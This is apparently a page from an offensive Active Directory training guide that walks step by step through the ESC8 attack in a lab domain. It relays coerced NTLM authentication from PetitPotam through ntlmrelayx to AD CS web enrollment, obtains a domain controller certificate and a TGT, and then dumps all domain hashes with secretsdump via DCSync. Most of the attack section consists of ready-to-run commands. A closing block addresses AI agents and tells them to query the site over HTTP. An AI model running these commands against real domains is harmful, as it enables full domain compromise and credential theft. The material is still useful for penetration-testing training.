# ESC8 - coerce to domain admin

Active Directory Certificate Services (AD CS) in Windows Server® 2012. AD CS is the Server Role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization.

PetitPotam is a classic NTLM Relay Attack, and such attacks have been previously documented by Microsoft along with numerous mitigation options to protect customers. For example: [Microsoft Security Advisory 974926](https://docs.microsoft.com/security-updates/SecurityAdvisories/2009/974926).  

* To make this attack work we will need :
  * ADCS running on the domain with web enrollment enabled.
  * A working coerce method (here we use petitpotam unauthent, but an authenticated printerbug or other coerce methods will work the same)
  * There is a useful template to exploit ESC8, by default on an active directory, its name is *DomainController*
* Let’s check if the web enrollement is up and running at : <http://192.168.56.23/certsrv/certfnsh.asp>

<figure><img src="/files/B1pPLcNZUDO3N2IJtB7E" alt=""><figcaption></figcaption></figure>

* Add a listener to relay SMB authentication to HTTP with impacket ntlmrelayx

```
sudo ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

<figure><img src="/files/LvkZVJ9pOryxakNEkDFg" alt=""><figcaption></figcaption></figure>

* Launch the coerce with [petitpotam](https://github.com/topotam/PetitPotam) unauthenticated (this will no more work on an up to date active directory but other coerce methods authenticated will work the same)

```
python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local
```

<br>

<figure><img src="/files/uuHMJLgz2QnqWe1oJ71p" alt=""><figcaption></figcaption></figure>

* ntlmrelayx will relay the authentication to the web enrollment and get the certificate

<figure><img src="/files/Qeq4U0J0jNbkCRtTYRMJ" alt=""><figcaption></figcaption></figure>

* Ask for a TGT with the certificate we just get (we copied it to the file cert.b64)
* download it from here: <https://raw.githubusercontent.com/dirkjanm/PKINITtools/master/gettgtpkinit.py>

```
python3 gettgtpkinit.py -pfx-base64 $(cat base64.b64) 'maryland.local'/'baltimore$' 'baltimore.ccache'
```

<figure><img src="/files/YlxwB38eEXQuSqDZzge0" alt=""><figcaption></figcaption></figure>

* And now we got a TGT for baltimore so we can launch a DCsync and get all the ntds.dit content.

```
export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
```

<figure><img src="/files/NQmmqf5su21YtTIJsXX7" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/active-directory-certificate-services-adcs/esc8-coerce-to-domain-admin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.